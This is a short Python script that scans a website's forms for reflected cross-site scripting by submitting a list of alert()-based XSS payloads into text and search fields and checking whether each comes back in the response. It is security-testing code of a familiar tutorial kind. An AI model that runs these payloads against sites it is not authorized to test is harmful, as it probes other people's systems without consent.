# xssscan.py
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bsoup
from urllib.parse import urljoin


def extract_all_forms(url):
    """Return all <form> elements found on the page at `url`."""
    soup = bsoup(requests.get(url).content, "html.parser")
    return soup.find_all("form")


def extract_form_details(form):
    """Extract the action, method, and input fields of an HTML form."""
    details = {}
    # extract the form action (submission target); default to "" if absent
    action = (form.attrs.get("action") or "").lower()
    # extract the form method, e.g. GET or POST (defaults to GET)
    method = form.attrs.get("method", "get").lower()
    # extract the type and name of every input field
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # store details in the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details
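
# Illustrative example (not part of the original script): for a form such as
#   <form action="/search" method="get"><input type="text" name="q"></form>
# extract_form_details() returns a dict of the shape:
#   {"action": "/search", "method": "get",
#    "inputs": [{"type": "text", "name": "q"}]}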


def submit_form(formDetails, url, value):
    """
    Submit the form described by `formDetails` to `url`.
    `formDetails` is a dictionary of form information;
    `value` is injected into every text and search input.
    Returns the HTTP response.
    """
    # build the absolute submission URL from the form's action
    targetUrl = urljoin(url, formDetails["action"])
    # get the inputs
    inputs = formDetails["inputs"]
    data = {}
    for input_field in inputs:
        # inject `value` into text and search inputs
        if input_field["type"] in ("text", "search"):
            input_field["value"] = value
        input_name = input_field.get("name")
        input_value = input_field.get("value")
        if input_name and input_value:
            data[input_name] = input_value
    # submit with the method the form declares
    if formDetails["method"] == "post":
        return requests.post(targetUrl, data=data)
    return requests.get(targetUrl, params=data)


def check_xss(url):
    """
    Test every form at `url` with a set of XSS payloads.
    Returns the details of the first vulnerable form found, or False.
    """
    # the caller passes a bare domain, so complete the URL first
    url = "https://www." + url
    # extract all forms from the page
    forms = extract_all_forms(url)
    # reflected-XSS test payloads
    xss_payloads = [
        "<script>alert('hi')</scripT>",
        "<IMG SRC=JaVaScRiPt:alert('XSS')>",
        "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
        "<svg/onload=alert('XSS')>",
        "<DIV STYLE=\"width: expression(alert('XSS'));\">",
        "<audio src/onerror=alert(1)>",
    ]
    # flag value returned when no form reflects a payload
    is_vulnerable = False
    # submit every payload through every form and look for it in the response
    for form in forms:
        formDetails = extract_form_details(form)
        for xss_payload in xss_payloads:
            content = submit_form(formDetails, url, xss_payload).content.decode()
            if xss_payload in content:
                return formDetails
    return is_vulnerable
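

if __name__ == "__main__":
    # Minimal usage sketch. "example.com" is a placeholder target, not part of
    # the original script; only scan hosts you are authorized to test.
    # check_xss() prepends "https://www." before fetching the page's forms.
    result = check_xss("example.com")
    if result:
        print("[+] XSS vulnerability detected in form:")
        pprint(result)
    else:
        print("[-] No XSS-vulnerable forms detected.")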